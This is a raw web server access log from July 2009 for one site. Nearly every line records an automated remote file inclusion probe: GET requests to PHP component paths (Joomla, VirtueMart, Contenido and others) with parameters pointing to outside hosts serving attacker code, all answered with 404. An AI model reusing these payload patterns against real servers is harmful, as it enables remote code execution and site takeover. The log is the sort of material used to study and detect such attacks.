89.223.3.98 - - [04/Jul/2009:11:13:22 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:22 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:22 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:22 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:22 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:11:13:22 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:15:58 -0700] "GET /logs/access_090521.log%20%20//Neos_Chronos/header.php?base_folder=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:11:16:05 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:11:16:05 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:11:16:05 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:11:16:20 -0700] "GET /phphtml.php?htmlclass_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:11:16:20 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:11:16:21 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:11:16:42 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:11:16:42 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:11:16:43 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:11:17:12 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:11:17:12 -0700] "GET /phphtml.php?htmlclass_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:11:17:12 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:21:09 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:21:09 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:21:09 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:21:17 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:21:17 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:21:17 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:22:33 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:11:22:52 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:22:56 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:22:56 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:22:57 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:23:06 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:23:06 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:23:06 -0700] "GET /logs/access.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:11:24:51 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:11:24:51 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:11:24:51 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:11:24:53 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:11:24:53 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:11:24:53 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:11:25:27 -0700] "GET /logs//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:11:25:27 -0700] "GET /logs/access.log%20%20//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:11:25:27 -0700] "GET /components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:11:25:32 -0700] "GET /logs//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:11:25:32 -0700] "GET /logs/access.log%20%20//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:11:25:32 -0700] "GET /components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:11:26:07 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:11:26:09 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:11:27:40 -0700] "GET /logs/skin_shop/standard/plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:11:27:40 -0700] "GET /logs/access.log%20%20/skin_shop/standard/plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
217.147.29.190 - - [04/Jul/2009:11:27:40 -0700] "GET /skin_shop/standard/plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:11:29:00 -0700] "GET /logs/scripts.log%20%20//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:11:29:00 -0700] "GET /components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:11:29:00 -0700] "GET /logs//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:11:29:12 -0700] "GET /logs//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:11:29:12 -0700] "GET /components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:11:29:12 -0700] "GET /logs/scripts.log%20%20//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:11:30:22 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:11:30:22 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:11:30:22 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:11:30:22 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:11:30:22 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:11:30:22 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:11:31:21 -0700] "GET /logs/access.log//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:11:31:27 -0700] "GET /logs/access.log//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:11:31:27 -0700] "GET /main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:11:31:27 -0700] "GET /logs//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:11:33:08 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:11:33:28 -0700] "GET /logs/access.log//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:11:33:32 -0700] "GET /logs/access.log//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:11:33:32 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:11:33:32 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:11:33:32 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:11:33:36 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:11:33:36 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:11:33:36 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:34:37 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:34:37 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:34:38 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:35:21 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:35:21 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:35:21 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:35:23 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:35:24 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:11:35:24 -0700] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:11:36:05 -0700] "GET /main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:11:36:05 -0700] "GET /logs//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:11:36:10 -0700] "GET /logs/access_090212.log%20%20//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:11:40:32 -0700] "GET /logs/access.log//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:11:41:05 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:11:41:05 -0700] "GET //administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:11:41:06 -0700] "GET /logs///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:11:41:10 -0700] "GET //administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:11:41:10 -0700] "GET /logs///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:11:41:10 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:11:41:32 -0700] "GET //administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:11:41:32 -0700] "GET /logs///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:11:41:32 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:11:42:46 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:11:42:46 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:11:42:46 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:11:42:49 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
